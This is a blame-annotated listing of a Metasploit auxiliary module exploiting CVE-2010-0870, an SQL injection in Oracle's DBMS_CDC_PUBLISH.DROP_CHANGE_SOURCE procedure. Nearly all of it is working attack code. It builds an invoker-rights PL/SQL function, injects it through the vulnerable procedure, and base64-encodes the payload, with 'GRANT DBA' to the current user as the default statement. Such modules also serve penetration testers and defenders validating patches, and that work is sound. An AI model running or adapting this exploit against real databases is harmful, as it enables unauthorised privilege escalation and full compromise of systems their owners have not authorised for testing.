2010-04-30 08:40:19 +00:00
|
|
|
##
|
|
|
|
# $Id$
|
|
|
|
##
|
|
|
|
|
2010-04-26 21:36:36 +00:00
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/projects/Framework/
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
|
|
|
|
include Msf::Exploit::ORACLE
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'SQL Injection via SYS.DBMS_CDC_PUBLISH.DROP_CHANGE_SOURCE',
|
|
|
|
'Description' => %q{
|
2010-04-30 08:40:19 +00:00
|
|
|
The module exploits an sql injection flaw in the DROP_CHANGE_SOURCE
|
|
|
|
procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege
|
2010-04-26 21:36:36 +00:00
|
|
|
on the vulnerable package can exploit this vulnerability. By default, users granted
|
2010-04-30 08:40:19 +00:00
|
|
|
EXECUTE_CATALOG_ROLE have the required privilege.
|
2010-04-26 21:36:36 +00:00
|
|
|
},
|
|
|
|
'Author' => [ 'MC' ],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Version' => '$Revision: $',
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'CVE', '2010-0870' ],
|
2010-04-27 11:16:52 +00:00
|
|
|
[ 'OSVDB', '63772'],
|
2010-04-26 21:36:36 +00:00
|
|
|
[ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2010.html' ],
|
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Apr 26 2010'))
|
|
|
|
|
2010-04-30 08:40:19 +00:00
|
|
|
register_options(
|
2010-04-26 21:36:36 +00:00
|
|
|
[
|
2010-04-30 08:40:19 +00:00
|
|
|
OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]),
|
2010-04-26 21:36:36 +00:00
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
|
|
|
return if not check_dependencies
|
|
|
|
|
2010-04-30 08:40:19 +00:00
|
|
|
name = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
|
2010-04-26 21:36:36 +00:00
|
|
|
var1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
|
|
|
|
var2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
|
|
|
|
|
|
|
|
function = "
|
2010-04-30 08:40:19 +00:00
|
|
|
CREATE OR REPLACE FUNCTION #{name}
|
2010-04-26 21:36:36 +00:00
|
|
|
RETURN VARCHAR2 AUTHID CURRENT_USER
|
|
|
|
IS
|
|
|
|
PRAGMA AUTONOMOUS_TRANSACTION;
|
|
|
|
BEGIN
|
|
|
|
EXECUTE IMMEDIATE '#{datastore['SQL']}';
|
|
|
|
COMMIT;
|
|
|
|
RETURN NULL;
|
|
|
|
END;
|
|
|
|
"
|
|
|
|
|
|
|
|
package = "
|
|
|
|
BEGIN
|
|
|
|
SYS.DBMS_CDC_PUBLISH.DROP_CHANGE_SOURCE('''||'||user||'.#{name}||''');
|
|
|
|
END;
|
|
|
|
"
|
|
|
|
|
|
|
|
uno = Rex::Text.encode_base64(function)
|
|
|
|
dos = Rex::Text.encode_base64(package)
|
|
|
|
|
|
|
|
encoded_sql = %Q|
|
|
|
|
DECLARE
|
|
|
|
#{var1} VARCHAR2(32767);
|
|
|
|
#{var2} VARCHAR2(32767);
|
|
|
|
BEGIN
|
|
|
|
#{var1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{uno}')));
|
|
|
|
EXECUTE IMMEDIATE #{var1};
|
|
|
|
#{var2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}')));
|
|
|
|
EXECUTE IMMEDIATE #{var2};
|
|
|
|
END;
|
|
|
|
|
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2010-04-26 21:36:36 +00:00
|
|
|
print_status("Attempting sql injection on SYS.DBMS_CDC_PUBLISH.DROP_CHANGE_SOURCE...")
|
|
|
|
prepare_exec(encoded_sql)
|
|
|
|
print_status("Done...")
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|